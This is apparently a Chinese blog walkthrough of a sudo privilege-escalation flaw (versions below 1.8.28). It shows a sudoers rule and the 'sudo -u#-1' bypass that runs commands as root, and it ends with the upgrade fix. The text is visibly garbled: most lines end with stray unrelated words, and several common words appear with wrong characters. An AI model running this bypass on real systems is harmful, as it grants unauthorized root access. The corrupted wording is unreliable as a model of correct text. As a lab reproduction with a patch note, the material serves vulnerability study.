Sudo提权漏洞复现

Sudolinux的系统命令,让普通帐号以root方式执行命令linux

 

正常来讲若是普通用户须要用sudo,须要修改配置文件/etc/sudoers,sudo使用权赋予该用户vim

 

而这个漏洞使得普通用户也能够绕过安全策略,执行敏感命令安全

漏洞影响的版本是<1.8.28spa

 

实验环境:kali3d

 

漏洞复现过程blog

 

一、 查看sudo版本class

 

Sudo –Vtest

 

 

 

 

 

二、 修改配置文件:vim/etc/sudoers root(ALL:ALL)ALL添加一行配置

 

Test ALL=(ALL,!root)ALL权限

 

 

第一个ALL表示用户能够在任意地方使用sudo

第二个(ALL,!root)表示命令能够被除了root之外的任意用户执行

最后一个ALL表示容许被执行

总体代码:test用户能够使用sudo,是除了root之外的任意用户去执行

 

 

 

注意:须要建立test用户:useradd  test   passwd test

 

 

 

 

 

 

 

三、 切换到test用户

 

Su test

 

而后sudo id(查看rootID

 

 

 

发现没有权限执行

 

四、 使用如下方法去执行想要的执行的命令

 

Sudo –u#数字 命令

 

其中数字范围:-1~4294967295,命令是系统命令

 

数字-1或者最大表明root用户

 

修复方法:更新sudo版本>=1.8.28

 

该漏洞比较鸡肋,须要管理员修改配置文件

相关文章
相关标签/搜索